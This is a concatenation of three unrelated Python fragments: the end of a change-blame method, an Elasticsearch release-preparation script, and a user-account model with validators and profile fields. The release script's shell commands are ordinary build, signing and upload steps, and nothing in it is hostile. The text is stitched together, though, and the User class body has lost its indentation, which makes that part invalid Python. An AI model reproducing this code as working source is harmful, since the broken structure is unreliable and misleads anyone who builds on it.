                for change in changes:
                    if change.project in failed_projects:
                        blame_assigned = True
                        suspects.add(change)
                if not blame_assigned:
                    blame_everything = True
        if blame_everything or not suspects:
            # BUG FIX: previously returned a *list* copy (changes[:]) here,
            # although the method is documented to return a set.
            suspects = set(changes)
        else:
            # Never treat changes to overlays as innocent.
            suspects.update(change for change in changes
                            if '/overlays/' in change.project)
        return suspects
| |
# Licensed to Elasticsearch under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on
# an 'AS IS' BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
# Prepare a release
#
# 1. Update the Version.java to remove the snapshot bit
# 2. Remove the -SNAPSHOT suffix in all pom.xml files
#
# USAGE:
#
# python3 ./dev-tools/prepare-release.py
#
# Note: Ensure the script is run from the elasticsearch top level directory
#
import fnmatch
import argparse
from prepare_release_update_documentation import update_reference_docs
import subprocess
import tempfile
import re
import os
import shutil
from functools import partial
from os.path import expanduser
import sys
# Repo-root-relative paths of the files rewritten during release preparation.
VERSION_FILE = 'core/src/main/java/org/elasticsearch/Version.java'
POM_FILE = 'pom.xml'

# Announcement mail skeleton; %-formatted with the keys
# version / hash / bucket / package_repo_version.
MAIL_TEMPLATE = """
Hi all
The new release candidate for %(version)s is now available, including the x-plugins and RPM/deb repos. This release is based on:
* Elasticsearch commit: %(hash)s - https://github.com/elastic/elasticsearch/commit/%(hash)s
* X-Plugins commit: FILL_IN_X-PLUGINS_HASH - https://github.com/elastic/x-plugins/commit/FILL_IN_X-PLUGINS_HASH
The packages may be downloaded from the following URLs:
* ZIP - https://%(bucket)s/elasticsearch/staging/%(version)s-%(hash)s/org/elasticsearch/distribution/zip/elasticsearch/%(version)s/elasticsearch-%(version)s.zip
* tar.gz - https://%(bucket)s/elasticsearch/staging/%(version)s-%(hash)s/org/elasticsearch/distribution/tar/elasticsearch/%(version)s/elasticsearch-%(version)s.tar.gz
* RPM - https://%(bucket)s/elasticsearch/staging/%(version)s-%(hash)s/org/elasticsearch/distribution/rpm/elasticsearch/%(version)s/elasticsearch-%(version)s.rpm
* deb - https://%(bucket)s/elasticsearch/staging/%(version)s-%(hash)s/org/elasticsearch/distribution/deb/elasticsearch/%(version)s/elasticsearch-%(version)s.deb
Plugins can be installed as follows:
bin/plugin -Des.plugins.staging=true install cloud-aws
The same goes for the x-plugins:
bin/plugin -Des.plugins.staging=true install license
bin/plugin -Des.plugins.staging=true install marvel-agent
bin/plugin -Des.plugins.staging=true install shield
bin/plugin -Des.plugins.staging=true install watcher
To install the deb from an APT repo:
APT line sources.list line:
deb https://%(bucket)s/elasticsearch/staging/%(version)s-%(hash)s/repos/%(package_repo_version)s/debian/ stable main
To install the RPM, create a YUM file like:
/etc/yum.repos.d/elasticsearch.repo
containing:
[elasticsearch-2.x]
name=Elasticsearch repository for packages
baseurl=https://%(bucket)s/elasticsearch/staging/%(version)s-%(hash)s/repos/%(package_repo_version)s/centos
gpgcheck=1
gpgkey=https://packages.elastic.co/GPG-KEY-elasticsearch
enabled=1
To smoke-test the release please run:
python3 -B ./dev-tools/smoke_test_rc.py --version %(version)s --hash %(hash)s --plugins license,shield,watcher,graph
NOTE: this script requires JAVA_HOME to point to a Java 7 Runtime
"""

# console colors (ANSI escape sequences)
COLOR_OK = '\033[92m'
COLOR_END = '\033[0m'
COLOR_FAIL = '\033[91m'
def run(command, env_vars=None):
    """Run *command* through the shell, raising RuntimeError on failure.

    Args:
        command: Shell command line to execute.
        env_vars: Optional dict of environment variables exported before the
            command runs (they remain set for the rest of this process).

    Raises:
        RuntimeError: If the command exits with a non-zero status.
    """
    if env_vars:
        for key, value in env_vars.items():
            # Assign via os.environ rather than os.putenv: putenv does not
            # update os.environ, so the change would be invisible to this
            # process; os.environ assignment updates both.
            os.environ[key] = value
    print('*** Running: %s%s%s' % (COLOR_OK, command, COLOR_END))
    if os.system(command):
        raise RuntimeError(' FAILED: %s' % (command))
def ensure_checkout_is_clean():
    """Abort unless the git working copy is clean and in sync with origin."""
    # No local modifications allowed.
    diff_stat = subprocess.check_output('git diff --shortstat', shell=True).decode('utf-8')
    if len(diff_stat) > 0:
        raise RuntimeError('git diff --shortstat is non-empty got:\n%s' % diff_stat)
    status = subprocess.check_output('git status', shell=True).decode('utf-8', errors='replace')
    # No untracked files allowed.
    if 'Untracked files:' in status:
        if 'dev-tools/__pycache__/' in status:
            print('*** NOTE: invoke python with -B to prevent __pycache__ directories ***')
        raise RuntimeError('git status shows untracked files got:\n%s' % status)
    # All changes from origin must be pulled already.
    if 'is behind' in status:
        raise RuntimeError('git status shows not all changes pulled from origin; try running "git pull origin" in this branch got:\n%s' % (status))
    # No local unpushed commits (this is supposed to be a clean area).
    if 'is ahead' in status:
        raise RuntimeError('git status shows local commits; try running "git fetch origin", "git checkout ", "git reset --hard origin/" in this branch got:\n%s' % (status))
# Reads the given file and applies the callback to it. If the callback changed
# a line the given file is replaced with the modified input.
def process_file(file_path, line_callback):
    """Apply *line_callback* to every line of *file_path*, rewriting in place.

    Args:
        file_path: Path of the text file to transform.
        line_callback: Callable taking a line and returning the (possibly
            modified) line to write.

    Returns:
        True if any line changed (file replaced), False otherwise.
    """
    fh, abs_path = tempfile.mkstemp()
    modified = False
    try:
        # Wrap the fd returned by mkstemp directly instead of opening the
        # path a second time; closing the handle also closes the fd, so no
        # descriptor is leaked.
        with os.fdopen(fh, 'w', encoding='utf-8') as new_file:
            with open(file_path, encoding='utf-8') as old_file:
                for line in old_file:
                    new_line = line_callback(line)
                    modified = modified or (new_line != line)
                    new_file.write(new_line)
    except Exception:
        # Don't leave the temp file behind if the callback or I/O fails.
        os.remove(abs_path)
        raise
    if modified:
        # Replace the original with the rewritten copy.
        os.remove(file_path)
        shutil.move(abs_path, file_path)
        return True
    # Nothing to do - just remove the tmp file.
    os.remove(abs_path)
    return False
# Moves the Version.java file from a snapshot to a release
def remove_version_snapshot(version_file, release):
    """Flip the snapshot flag to false for *release* inside Version.java."""
    # Version ids use underscores: 1.0.0.Beta1 -> 1_0_0_Beta1
    version_token = release.replace('.', '_').replace('-', '_')
    pattern = 'new Version(V_%s_ID, true' % (version_token)
    replacement = 'new Version(V_%s_ID, false' % (version_token)
    changed = process_file(version_file,
                           lambda line: line.replace(pattern, replacement))
    if not changed:
        raise RuntimeError('failed to remove snapshot version for %s' % (version_token))
def rename_local_meta_files(path):
    """Strip the '-local' marker from maven-metadata files under *path*."""
    for root, _, file_names in os.walk(path):
        matches = fnmatch.filter(file_names, 'maven-metadata-local.xml*')
        for file_name in matches:
            source = os.path.join(root, file_name)
            target = os.path.join(root, file_name.replace('-local', ''))
            os.rename(source, target)
# Checks the pom.xml for the release version.
# This method fails if the pom file has no SNAPSHOT version set ie.
# if the version is already on a release version we fail.
# Returns the next version string ie. 0.90.7
def find_release_version(pom_file='pom.xml'):
    """Extract the release version from a ``-SNAPSHOT`` <version> tag.

    Args:
        pom_file: Path of the pom to inspect; defaults to the top-level
            'pom.xml', matching the previous hard-coded behavior.

    Returns:
        The version string without the -SNAPSHOT suffix, e.g. '0.90.7'.

    Raises:
        RuntimeError: If no -SNAPSHOT version tag is found.
    """
    snapshot_re = re.compile(r'<version>(.+)-SNAPSHOT</version>')
    with open(pom_file, encoding='utf-8') as file:
        for line in file:
            match = snapshot_re.search(line)
            if match:
                return match.group(1)
    raise RuntimeError('Could not find release version in branch')
# Checks if the produced RPM is signed with the supplied GPG key
def ensure_rpm_is_signed(rpm, gpg_key):
    """Raise RuntimeError unless *rpm* appears to be signed with *gpg_key*.

    Shells out to ``rpm -v -K`` and greps for the key id; any non-zero exit
    of the pipeline is treated as "not signed".
    """
    rpm_check_signature_cmd = 'rpm -v -K %s | grep -qi %s' % (rpm, gpg_key)
    try:
        subprocess.check_output(rpm_check_signature_cmd, shell=True)
    except subprocess.CalledProcessError:
        # Narrowed from a bare `except:`, which also swallowed
        # KeyboardInterrupt/SystemExit.
        raise RuntimeError('Aborting. RPM does not seem to be signed, check with: rpm -v -K %s' % rpm)
# Checks if a command exists, needed for external binaries
def check_command_exists(name, cmd):
    """Run *cmd*; raise RuntimeError if it cannot be executed successfully."""
    failure_message = ('Could not run command %s - please make sure it is '
                       'installed and in $PATH' % (name))
    try:
        subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
    except subprocess.CalledProcessError:
        raise RuntimeError(failure_message)
def run_and_print(text, run_function):
    """Print *text*, invoke *run_function*, and report colored OK/NOT OK.

    Returns:
        True if *run_function* completed, False if it raised RuntimeError.
    """
    print(text, end='')
    try:
        run_function()
    except RuntimeError:
        print(COLOR_FAIL + 'NOT OK' + COLOR_END)
        return False
    print(COLOR_OK + 'OK' + COLOR_END)
    return True
def check_env_var(text, env_var):
    """Print *text* and report (in color) whether *env_var* is set.

    Returns:
        True if the environment variable exists, False otherwise.
    """
    print(text, end='')
    if env_var in os.environ:
        print(COLOR_OK + 'OK' + COLOR_END)
        return True
    print(COLOR_FAIL + 'NOT OK' + COLOR_END)
    return False
def check_environment_and_commandline_tools(check_only):
    """Verify that required env vars and external tools are available.

    Args:
        check_only: If True, exit(0) immediately after reporting results
            (used by --check).

    Exits the process with status 1 if any check failed.
    """
    checks = list()
    checks.append(check_env_var('Checking for AWS env configuration AWS_SECRET_KEY... ', 'AWS_SECRET_KEY'))
    checks.append(check_env_var('Checking for AWS env configuration AWS_ACCESS_KEY... ', 'AWS_ACCESS_KEY'))
    checks.append(run_and_print('Checking command: rpm... ', partial(check_command_exists, 'rpm', 'rpm --version')))
    checks.append(run_and_print('Checking command: dpkg... ', partial(check_command_exists, 'dpkg', 'dpkg --version')))
    checks.append(run_and_print('Checking command: gpg... ', partial(check_command_exists, 'gpg', 'gpg --version')))
    checks.append(run_and_print('Checking command: expect... ', partial(check_command_exists, 'expect', 'expect -v')))
    checks.append(run_and_print('Checking command: createrepo... ', partial(check_command_exists, 'createrepo', 'createrepo --version')))
    checks.append(run_and_print('Checking command: s3cmd... ', partial(check_command_exists, 's3cmd', 's3cmd --version')))
    checks.append(run_and_print('Checking command: deb-s3... ', partial(check_command_exists, 'deb-s3', 'deb-s3 -h')))
    checks.append(run_and_print('Checking command: rpm-s3... ', partial(check_command_exists, 'rpm-s3', 'rpm-s3 -h')))
    if check_only:
        sys.exit(0)
    if False in checks:
        print("Exiting due to failing checks")
        # BUG FIX: was sys.exit(0), which reported success to callers/CI even
        # though required tools or credentials were missing.
        sys.exit(1)
if __name__ == "__main__":
    # ---- Command line ----------------------------------------------------
    parser = argparse.ArgumentParser(description='Builds and publishes a Elasticsearch Release')
    parser.add_argument('--deploy-sonatype', dest='deploy_sonatype', action='store_true',
                        help='Installs and Deploys the release on a sonatype staging repository.')
    parser.add_argument('--deploy-s3', dest='deploy_s3', action='store_true',
                        help='Pushes artifacts to the S3 staging area')
    parser.add_argument('--deploy-s3-repos', dest='deploy_s3_repos', action='store_true',
                        help='Creates package repositories in S3 repo')
    parser.add_argument('--no-install', dest='no_install', action='store_true',
                        help='Does not run "mvn install", expects this to be run already and reuses artifacts from local repo, only useful with --deploy-s3/--deploy-s3-repos, after sonatype deployment to ensure same artifacts')
    # BUG FIX: was action='store_false', which combined with
    # set_defaults(skip_doc_check=False) below made the flag a no-op.
    parser.add_argument('--skip-doc-check', dest='skip_doc_check', action='store_true',
                        help='Skips any checks for pending documentation changes')
    parser.add_argument('--skip-tests', dest='skip_tests', action='store_true',
                        help='Skips any test runs')
    parser.add_argument('--gpg-key', dest='gpg_key', default="D88E42B4",
                        help='Allows you to specify a different gpg_key to be used instead of the default release key')
    parser.add_argument('--bucket', '-b', dest='bucket', default="download.elasticsearch.org",
                        help='Allows you to specify a different s3 bucket to upload the artifacts to')
    parser.add_argument('--quiet', dest='quiet', action='store_true',
                        help='Runs the script in quiet mode')
    parser.add_argument('--check', dest='check', action='store_true',
                        help='Checks and reports for all requirements and then exits')
    # by default, we only run mvn install and dont push anything repo
    parser.set_defaults(deploy_sonatype=False)
    parser.set_defaults(deploy_s3=False)
    parser.set_defaults(deploy_s3_repos=False)
    parser.set_defaults(no_install=False)
    # other defaults
    parser.set_defaults(skip_doc_check=False)
    parser.set_defaults(quiet=False)
    parser.set_defaults(skip_tests=False)
    args = parser.parse_args()
    skip_doc_check = args.skip_doc_check
    gpg_key = args.gpg_key
    bucket = args.bucket
    deploy_sonatype = args.deploy_sonatype
    deploy_s3 = args.deploy_s3
    deploy_s3_repos = args.deploy_s3_repos
    run_mvn_install = not args.no_install
    skip_tests = args.skip_tests
    check_environment_and_commandline_tools(args.check)
    # --no-install reuses artifacts from the local repo, which contradicts a
    # fresh sonatype deploy, so the two flags are mutually exclusive.
    if not run_mvn_install and deploy_sonatype:
        print('Using --no-install and --deploy-sonatype together does not work. Exiting')
        sys.exit(-1)
    print('*** Preparing a release candidate: ', end='')
    print('deploy sonatype: %s%s%s' % (COLOR_OK if deploy_sonatype else COLOR_FAIL, 'yes' if deploy_sonatype else 'no', COLOR_END), end='')
    print(', deploy s3: %s%s%s' % (COLOR_OK if deploy_s3 else COLOR_FAIL, 'yes' if deploy_s3 else 'no', COLOR_END), end='')
    print(', deploy s3 repos: %s%s%s' % (COLOR_OK if deploy_s3_repos else COLOR_FAIL, 'yes' if deploy_s3_repos else 'no', COLOR_END), end='')
    print('')
    # ---- Derive version/paths from the checkout --------------------------
    shortHash = subprocess.check_output('git log --pretty=format:"%h" -n 1', shell=True).decode('utf-8')
    releaseDirectory = os.getenv('HOME') + '/elastic-releases'
    release_version = find_release_version()
    localRepo = '%s/elasticsearch-%s-%s' % (releaseDirectory, release_version, shortHash)
    localRepoElasticsearch = localRepo + '/org/elasticsearch'
    ensure_checkout_is_clean()
    if not re.match(r'(\d+\.\d+)\.*', release_version):
        raise RuntimeError('illegal release version format: %s' % (release_version))
    package_repo_version = '%s.x' % re.match(r'(\d+)\.*', release_version).group(1)
    print('*** Preparing release version: [%s]' % release_version)
    if not skip_doc_check:
        print('*** Check for pending documentation changes')
        pending_files = update_reference_docs(release_version)
        if pending_files:
            raise RuntimeError('pending coming[%s] documentation changes found in %s' % (release_version, pending_files))
    # ---- Strip -SNAPSHOT from poms and Version.java ----------------------
    run('cd dev-tools && mvn versions:set -DnewVersion=%s -DgenerateBackupPoms=false' % (release_version))
    run('cd rest-api-spec && mvn versions:set -DnewVersion=%s -DgenerateBackupPoms=false' % (release_version))
    run('mvn versions:set -DnewVersion=%s -DgenerateBackupPoms=false' % (release_version))
    remove_version_snapshot(VERSION_FILE, release_version)
    print('*** Done removing snapshot version. DO NOT COMMIT THIS, WHEN CREATING A RELEASE CANDIDATE.')
    if not os.path.exists(releaseDirectory):
        os.mkdir(releaseDirectory)
    if os.path.exists(localRepoElasticsearch) and run_mvn_install:
        print('clean local repository %s' % localRepoElasticsearch)
        shutil.rmtree(localRepoElasticsearch)
    # ---- Build (or reuse) artifacts --------------------------------------
    mvn_target = 'deploy' if deploy_sonatype else 'install'
    tests = '-DskipTests' if skip_tests else '-Dskip.integ.tests=true'
    install_command = 'mvn clean %s -Prelease %s -Dgpg.key="%s" -Dgpg.keypath="%s" -Dpackaging.rpm.rpmbuild=/usr/bin/rpmbuild -Drpm.sign=true -Dmaven.repo.local=%s -Dno.commit.pattern="\\bno(n|)commit\\b" -Dforbidden.test.signatures=""' % (mvn_target, tests, gpg_key, expanduser("~/.gnupg"), localRepo)
    clean_repo_command = 'find %s -name _remote.repositories -exec rm {} \\;' % (localRepoElasticsearch)
    if not run_mvn_install:
        print('')
        print('*** By choosing --no-install we assume you ran the following commands successfully:')
        print(' %s' % (install_command))
        print(' 1. Remove all _remote.repositories: %s' % (clean_repo_command))
        rename_metadata_files_command = 'for i in $(find %s -name "maven-metadata-local.xml*") ; do mv "$i" "${i/-local/}" ; done' % (localRepoElasticsearch)
        print(' 2. Rename all maven metadata files: %s' % (rename_metadata_files_command))
    else:
        for cmd in [install_command, clean_repo_command]:
            run(cmd)
        rename_local_meta_files(localRepoElasticsearch)
    rpm = '%s/distribution/rpm/elasticsearch/%s/elasticsearch-%s.rpm' % (localRepoElasticsearch, release_version, release_version)
    print('Ensuring that RPM has been signed')
    ensure_rpm_is_signed(rpm, gpg_key)
    # repository push commands
    s3cmd_sync_to_staging_bucket_cmd = 's3cmd sync -P %s s3://%s/elasticsearch/staging/%s-%s/org/' % (localRepoElasticsearch, bucket, release_version, shortHash)
    s3_bucket_sync_to = '%s/elasticsearch/staging/%s-%s/repos/' % (bucket, release_version, shortHash)
    s3cmd_sync_official_repo_cmd = 's3cmd sync s3://packages.elasticsearch.org/elasticsearch/%s s3://%s' % (package_repo_version, s3_bucket_sync_to)
    debs3_prefix = 'elasticsearch/staging/%s-%s/repos/%s/debian' % (release_version, shortHash, package_repo_version)
    debs3_upload_cmd = 'deb-s3 upload --preserve-versions %s/distribution/deb/elasticsearch/%s/elasticsearch-%s.deb -b %s --prefix %s --sign %s --arch amd64' % (localRepoElasticsearch, release_version, release_version, bucket, debs3_prefix, gpg_key)
    debs3_list_cmd = 'deb-s3 list -b %s --prefix %s' % (bucket, debs3_prefix)
    debs3_verify_cmd = 'deb-s3 verify -b %s --prefix %s' % (bucket, debs3_prefix)
    rpms3_prefix = 'elasticsearch/staging/%s-%s/repos/%s/centos' % (release_version, shortHash, package_repo_version)
    # external-1 is the alias name for the us-east-1 region. This is used by rpm-s3 to construct the hostname
    rpms3_upload_cmd = 'rpm-s3 -v -b %s -p %s --sign --visibility public-read -k 100 %s -r external-1' % (bucket, rpms3_prefix, rpm)
    if deploy_s3:
        run(s3cmd_sync_to_staging_bucket_cmd)
    else:
        print('')
        print('*** To push a release candidate to s3 run: ')
        print(' 1. Sync %s into S3 bucket' % (localRepoElasticsearch))
        print(' %s' % (s3cmd_sync_to_staging_bucket_cmd))
    if deploy_s3_repos:
        print('*** Syncing official package repository into staging s3 bucket')
        run(s3cmd_sync_official_repo_cmd)
        print('*** Uploading debian package (you will be prompted for the passphrase!)')
        run(debs3_upload_cmd)
        run(debs3_list_cmd)
        run(debs3_verify_cmd)
        print('*** Uploading rpm package (you will be prompted for the passphrase!)')
        run(rpms3_upload_cmd)
    else:
        print('*** To create repositories on S3 run:')
        print(' 1. Sync existing repo into staging: %s' % s3cmd_sync_official_repo_cmd)
        print(' 2. Upload debian package (and sign it): %s' % debs3_upload_cmd)
        print(' 3. List all debian packages: %s' % debs3_list_cmd)
        print(' 4. Verify debian packages: %s' % debs3_verify_cmd)
        print(' 5. Upload RPM: %s' % rpms3_upload_cmd)
    print('')
    # Typo fixes below in user-facing text: promt->prompt, suppliying->supplying.
    print('NOTE: the above mvn command will prompt you several times for the GPG passphrase of the key you specified you can alternatively pass it via -Dgpg.passphrase=yourPassPhrase')
    print(' since RPM signing doesn\'t support gpg-agents the recommended way to set the password is to add a release profile to your settings.xml:')
    print("""
<profiles>
<profile>
<id>release</id>
<properties>
<gpg.passphrase>YourPasswordGoesHere</gpg.passphrase>
</properties>
</profile>
</profiles>
""")
    print('NOTE: Running s3cmd might require you to create a config file with your credentials, if the s3cmd does not support supplying them via the command line!')
    print('*** Once the release is deployed and published send out the following mail to dev@elastic.co:')
    string_format_dict = {'version' : release_version, 'hash': shortHash, 'package_repo_version' : package_repo_version, 'bucket': bucket}
    print(MAIL_TEMPLATE % string_format_dict)
    print('')
    print('You can verify that pushing to the staging repository pushed all the artifacts by running (log into sonatype to find out the correct id):')
    print(' python -B dev-tools/validate-maven-repository.py %s https://oss.sonatype.org/service/local/repositories/orgelasticsearch-IDTOFINDOUT/content/org/elasticsearch ' %(localRepoElasticsearch))
    print('')
    print('To publish the release and the repo on S3 execute the following commands:')
    print(' s3cmd cp --recursive s3://%(bucket)s/elasticsearch/staging/%(version)s-%(hash)s/repos/%(package_repo_version)s/ s3://packages.elasticsearch.org/elasticsearch/%(package_repo_version)s' % string_format_dict)
    print(' s3cmd cp --recursive s3://%(bucket)s/elasticsearch/staging/%(version)s-%(hash)s/org/ s3://%(bucket)s/elasticsearch/release/org' % string_format_dict)
    print('Now go ahead and tag the release:')
    print(' git tag -a v%(version)s %(hash)s' % string_format_dict)
    print(' git push origin v%(version)s' % string_format_dict)
| |
# -*- coding: utf-8 -*-
import re
import logging
import urlparse
import itertools
import datetime as dt
import bson
import pytz
import itsdangerous
from modularodm import fields, Q
from modularodm.validators import URLValidator
from modularodm.exceptions import NoResultsFound
from modularodm.exceptions import ValidationError, ValidationValueError
import framework
from framework import analytics
from framework.sessions import session
from framework.auth import exceptions, utils, signals
from framework.sentry import log_exception
from framework.addons import AddonModelMixin
from framework.sessions.model import Session
from framework.sessions.utils import remove_sessions_for_user
from framework.exceptions import PermissionsError
from framework.guid.model import GuidStoredObject
from framework.bcrypt import generate_password_hash, check_password_hash
from framework.auth.exceptions import ChangePasswordError, ExpiredTokenError
from website import mails, settings, filters, security
# Maps a display-format label to a callable that renders a user's name.
# 'surname' falls back to the full name when family_name is empty.
name_formatters = {
    'long': lambda user: user.fullname,
    'surname': lambda user: user.family_name if user.family_name else user.fullname,
    'initials': lambda user: u'{surname}, {initial}.'.format(
        surname=user.family_name,
        initial=user.given_name_initial,
    ),
}

# Module-level logger for this model module.
logger = logging.getLogger(__name__)
# Hide implementation of token generation
def generate_confirm_token():
    """Return a random 30-character confirmation token."""
    return security.random_string(30)


def generate_claim_token():
    """Return a random 30-character claim token."""
    return security.random_string(30)
def string_required(value):
    """Validator: reject ``None`` and the empty string."""
    if value is not None and value != '':
        return
    raise ValidationValueError('Value must not be empty.')
def validate_history_item(item):
    """Validate a single job/school history entry (a dict)."""
    string_required(item.get('institution'))
    start_year = item.get('startYear')
    end_year = item.get('endYear')
    validate_year(start_year)
    validate_year(end_year)
    if start_year and end_year:
        if end_year < start_year:
            raise ValidationValueError('End date must be later than start date.')
        if end_year == start_year:
            # Same year: compare months when both are present.
            start_month = item.get('startMonth')
            end_month = item.get('endMonth')
            if end_month and start_month and end_month < start_month:
                raise ValidationValueError('End date must be later than start date.')
def validate_year(item):
    """Validate that *item*, when present, is a 4-digit year string."""
    if not item:
        # Missing/empty years are allowed.
        return
    try:
        int(item)
    except ValueError:
        raise ValidationValueError('Please enter a valid year.')
    if len(item) != 4:
        raise ValidationValueError('Please enter a valid year.')
# Shared URL validator instance; calling it raises ValidationError for
# malformed URLs.
validate_url = URLValidator()
def validate_personal_site(value):
    """Validate an optional personal website URL (empty values allowed)."""
    if not value:
        return
    try:
        validate_url(value)
    except ValidationError:
        # Reraise with a better message
        raise ValidationError('Invalid personal URL.')
def validate_social(value):
    """Validate the ``social`` dict of a user profile.

    Currently only the 'personal' URL is checked.
    """
    personal_url = value.get('personal')
    validate_personal_site(personal_url)
# TODO - rename to _get_current_user_from_session /HRYBACKI
def _get_current_user():
    """Return the User for the active session.

    NOTE(review): when there is no current session object the ``and``
    short-circuits and ``User.load`` is called with a falsy uid — presumably
    yielding None; confirm against ``User.load``.
    """
    uid = session._get_current_object() and session.data.get('auth_user_id')
    return User.load(uid)
# TODO: This should be a class method of User?
def get_user(email=None, password=None, verification_key=None):
    """Get an instance of User matching the provided params.

    :return: The instance of User requested
    :rtype: User or None

    NOTE(review): despite the :rtype:, a matching user with a *wrong*
    password yields ``False`` (not ``None``); callers appear to rely on the
    distinction — confirm before changing.  With only ``email`` supplied
    (no password or verification_key), the function falls through and
    implicitly returns ``None`` without querying.
    """
    # tag: database
    if password and not email:
        raise AssertionError("If a password is provided, an email must also "
                             "be provided.")
    query_list = []
    if email:
        email = email.strip().lower()
        # Match either a confirmed email address or the username itself.
        query_list.append(Q('emails', 'eq', email) | Q('username', 'eq', email))
    if password:
        password = password.strip()
        try:
            # AND together all collected query parts before querying.
            query = query_list[0]
            for query_part in query_list[1:]:
                query = query & query_part
            user = User.find_one(query)
        except Exception as err:
            # Broad catch: any lookup failure (e.g. NoResultsFound) is
            # logged and treated as "no such user".
            logger.error(err)
            user = None
        if user and not user.check_password(password):
            return False
        return user
    if verification_key:
        query_list.append(Q('verification_key', 'eq', verification_key))
        try:
            query = query_list[0]
            for query_part in query_list[1:]:
                query = query & query_part
            user = User.find_one(query)
            return user
        except Exception as err:
            logger.error(err)
            return None
class Auth(object):
    """Bundle of the credentials attached to a request."""

    def __init__(self, user=None, api_node=None, private_key=None):
        self.user = user
        self.api_node = api_node
        self.private_key = private_key

    def __repr__(self):
        template = ('<Auth(user="{self.user}", '
                    'private_key={self.private_key})>')
        return template.format(self=self)

    @property
    def logged_in(self):
        """True when a user is attached to this Auth object."""
        return self.user is not None

    @classmethod
    def from_kwargs(cls, request_args, kwargs):
        """Build an Auth from request args, falling back to the session user."""
        resolved_user = (request_args.get('user') or
                         kwargs.get('user') or
                         _get_current_user())
        return cls(
            user=resolved_user,
            private_key=request_args.get('view_only'),
        )
class User(GuidStoredObject, AddonModelMixin):
# Node fields that trigger an update to the search engine on save
SEARCH_UPDATE_FIELDS = {
'fullname',
'given_name',
'middle_names',
'family_name',
'suffix',
'merged_by',
'date_disabled',
'date_confirmed',
'jobs',
'schools',
'social',
}
# TODO: Add SEARCH_UPDATE_NODE_FIELDS, for fields that should trigger a
# search update for all nodes to which the user is a contributor.
SOCIAL_FIELDS = {
'orcid': u'http://orcid.com/{}',
'github': u'http://github.com/{}',
'scholar': u'http://scholar.google.com/citation?user={}',
'twitter': u'http://twitter.com/{}',
'personal': u'{}',
'linkedIn': u'https://www.linkedin.com/profile/view?id={}',
'impactStory': u'https://impactstory.org/{}',
'researcherId': u'http://researcherid.com/rid/{}',
}
# This is a GuidStoredObject, so this will be a GUID.
_id = fields.StringField(primary=True)
# The primary email address for the account.
# This value is unique, but multiple "None" records exist for:
# * unregistered contributors where an email address was not provided.
# TODO: Update mailchimp subscription on username change in user.save()
username = fields.StringField(required=False, unique=True, index=True)
# Hashed. Use `User.set_password` and `User.check_password`
password = fields.StringField()
fullname = fields.StringField(required=True, validate=string_required)
# user has taken action to register the account
is_registered = fields.BooleanField(index=True)
# user has claimed the account
# TODO: This should be retired - it always reflects is_registered.
# While a few entries exist where this is not the case, they appear to be
# the result of a bug, as they were all created over a small time span.
is_claimed = fields.BooleanField(default=False, index=True)
# a list of strings - for internal use
system_tags = fields.StringField(list=True)
# security emails that have been sent
# TODO: This should be removed and/or merged with system_tags
security_messages = fields.DictionaryField()
# Format: {
# <message label>: <datetime>
# ...
# }
# user was invited (as opposed to registered unprompted)
is_invited = fields.BooleanField(default=False, index=True)
# Per-project unclaimed user data:
# TODO: add validation
unclaimed_records = fields.DictionaryField(required=False)
# Format: {
# <project_id>: {
# 'name': <name that referrer provided>,
# 'referrer_id': <user ID of referrer>,
# 'token': <token used for verification urls>,
# 'email': <email the referrer provided or None>,
# 'claimer_email': <email the claimer entered or None>,
# 'last_sent': <timestamp of last email sent to referrer or None>
# }
# ...
# }
# Time of last sent notification email to newly added contributors
# Format : {
# <project_id>: {
# 'last_sent': time.time()
# }
# ...
# }
contributor_added_email_records = fields.DictionaryField(default=dict)
# The user into which this account was merged
merged_by = fields.ForeignField('user',
default=None,
backref='merged',
index=True)
# verification key used for resetting password
verification_key = fields.StringField()
# confirmed emails
# emails should be stripped of whitespace and lower-cased before appending
# TODO: Add validator to ensure an email address only exists once across
# all User's email lists
emails = fields.StringField(list=True)
# email verification tokens
# see also ``unconfirmed_emails``
email_verifications = fields.DictionaryField(default=dict)
# Format: {
# <token> : {'email': <email address>,
# 'expiration': <datetime>}
# }
# email lists to which the user has chosen a subscription setting
mailing_lists = fields.DictionaryField()
# Format: {
# 'list1': True,
# 'list2: False,
# ...
# }
# the date this user was registered
# TODO: consider removal - this can be derived from date_registered
date_registered = fields.DateTimeField(auto_now_add=dt.datetime.utcnow,
index=True)
# watched nodes are stored via a list of WatchConfigs
watched = fields.ForeignField("WatchConfig", list=True, backref="watched")
# list of users recently added to nodes as a contributor
recently_added = fields.ForeignField("user", list=True, backref="recently_added")
# Attached external accounts (OAuth)
external_accounts = fields.ForeignField("externalaccount",
list=True,
backref="connected")
# CSL names
given_name = fields.StringField()
middle_names = fields.StringField()
family_name = fields.StringField()
suffix = fields.StringField()
# Employment history
jobs = fields.DictionaryField(list=True, validate=validate_history_item)
# Format: {
# 'title': <position or job title>,
# 'institution': <institution or organization>,
# 'department': <department>,
# 'location': <location>,
# 'startMonth': <start month>,
# 'startYear': <start year>,
# 'endMonth': <end month>,
# 'endYear': <end year>,
# 'ongoing: <boolean>
# }
# Educational history
schools = fields.DictionaryField(list=True, validate=validate_history_item)
# Format: {
# 'degree': <position or job title>,
# 'institution': <institution or organization>,
# 'department': <department>,
# 'location': <location>,
# 'startMonth': <start month>,
# 'startYear': <start year>,
# 'endMonth': <end month>,
# 'endYear': <end year>,
# 'ongoing: <boolean>
# }
# Social links
social = fields.DictionaryField(validate=validate_social)
# Format: {
# 'personal': <personal site>,
# 'twitter': <twitter id>,
# }
# hashed password used to authenticate to Piwik
piwik_token = fields.StringField()
# date the user last logged in via the web interface
date_last_login = fields.DateTimeField()
# date the user first successfully confirmed an email address
date_confirmed = fields.DateTimeField(index=True)
# When the user was disabled.
date_disabled = fields.DateTimeField(index=True)
# when comments for a node were last viewed
comments_viewed_timestamp = fields.DictionaryField()
# Format: {
# 'node_id': 'timestamp'
# }
# timezone for user's locale (e.g. 'America/New_York')
timezone = fields.StringField(default='Etc/UTC')
# user language and locale data (e.g. 'en_US')
locale = fields.StringField(default='en_US')
_meta = {'optimistic': True}
